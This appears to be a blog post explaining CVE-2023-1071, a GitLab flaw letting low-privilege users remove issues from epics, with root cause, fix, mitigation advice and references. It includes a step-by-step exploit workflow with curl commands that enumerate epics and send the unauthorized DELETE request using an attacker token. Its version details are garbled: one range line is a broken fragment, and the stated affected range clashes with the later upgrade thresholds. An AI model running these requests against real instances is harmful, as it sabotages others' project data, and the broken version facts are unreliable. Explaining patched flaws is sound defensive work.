On February 23, 2023, a new security issue was quietly patched in GitLab, affecting a wide range of versions from 15.5 to 15.10.1. Registered as CVE-2023-1071, this flaw allows an unauthorized user to remove an issue from an Epic, breaking key project workflows and governance. This blog post digs deep into the how and why, including real-world impact, example exploit workflow, original references, and advice on staying safe.

Quick Summary

GitLab is a hugely popular open-source DevOps platform. It organizes work via Projects, Issues (tasks), and Epics (groups of Issues across projects, sub-epics, and more). Only authorized users are supposed to manage relationships between Issues and Epics.

But: Due to improper permission checks, *any logged-in user* (with just Guest access or less) could, under affected versions, remove an Issue from any Epic they could see—regardless of write/ownership rights.

15.10. ≤ version < 15.10.1

If your server runs one of these, you’re at risk.

Why Does this Matter?

- Workflow sabotage: Unauthorized users could “un-glue” issues from Epics, making tracking and dashboards inaccurate.
- Compliance impact: Auditors and managers can’t trust completeness of Epic-to-Issue relationships.
- Trust loss: Even if the code isn’t stolen, organizational trust in what’s happening on GitLab erodes.

Under the Hood: The Root Cause

According to GitLab’s Security Release Note:

> “An improper permissions check allowed an authenticated user to remove an issue from an epic even if that user does not have permission to edit the epic.”

Digging into the original patch, the issue was an API endpoint (DELETE /groups/:id/epics/:epic_id/issues/:epic_issue_id) that failed to verify permissions before processing the removal.

Let’s see how an unauthorized user could exploit this. All you need is

- Any user account (even “Guest” on a public project/group)

Step 1: Gather Info

Attackers can enumerate group, epic, and issue IDs using the normal GitLab web interface or API if visibility allows.

# Example: List epics in a group
curl --header "PRIVATE-TOKEN: <ATTACKER-TOKEN>" "https://gitlab.example.com/api/v4/groups/<group_id>/epics";

Now, invoke the vulnerable endpoint

# Remove Issue from Epic using unprivileged account
curl --request DELETE \
  --header "PRIVATE-TOKEN: <ATTACKER-TOKEN>" \
  "https://gitlab.example.com/api/v4/groups/<group_id>/epics/<epic_id>/issues/<epic_issue_id>";

Replace &lt;group_id&gt;, &lt;epic_id&gt;, and &lt;epic_issue_id&gt; with the actual IDs.
You can find epic_issue_id via the epics/issues API or by viewing browsers’ network tabs while looking at Epic relationships.

>If successful, this request unlinks the Issue from the Epic, with no error—even though the attacker lacks removal or edit rights.

The Issue vanishes from the Epic—messing with project roadmap and reporting.

No admin notification, no history unless you know where to look.

How Was It Fixed?

GitLab engineers patched this by enforcing robust permission checks in the controller and API endpoint, ensuring that only users with the right to “admin” the Epic or Issue can de-link them.

Commit reference:  
5fbf3498db86f468bc3d47c30e01935c42ec4bbe

Patch & Mitigation

- Upgrade now! If you’re running anything below 15.8.5, 15.9.4, or 15.10.1, update immediately.
- Audit epics: Review recent Epic changes for any suspicious/removal activity.
- Review permissions often: Least privilege is king. Don’t give more access than absolutely necessary!

NVD Entry for CVE-2023-1071:

https://nvd.nist.gov/vuln/detail/CVE-2023-1071

GitLab Security Release:

https://about.gitlab.com/releases/2023/02/23/critical-security-release-gitlab-15-8-5-released/

Patch Commit Details:

https://gitlab.com/gitlab-org/gitlab/-/commit/5fbf3498db86f468bc3d47c30e01935c42ec4bbe

API Docs for Epics and Issues:

https://docs.gitlab.com/ee/api/epics.html

Final Thoughts

CVE-2023-1071 is a reminder that even simple permission oversights can have big impact on software supply chains and trust in DevOps tools. Patch early, patch often!

Stay safe. Do a permission and version check today!

*This article is original and crafted exclusively for you. If sharing, please cite the original sources and this write-up!*

Timeline

Published on: 04/05/2023 21:15:00 UTC
Last modified on: 04/12/2023 19:23:00 UTC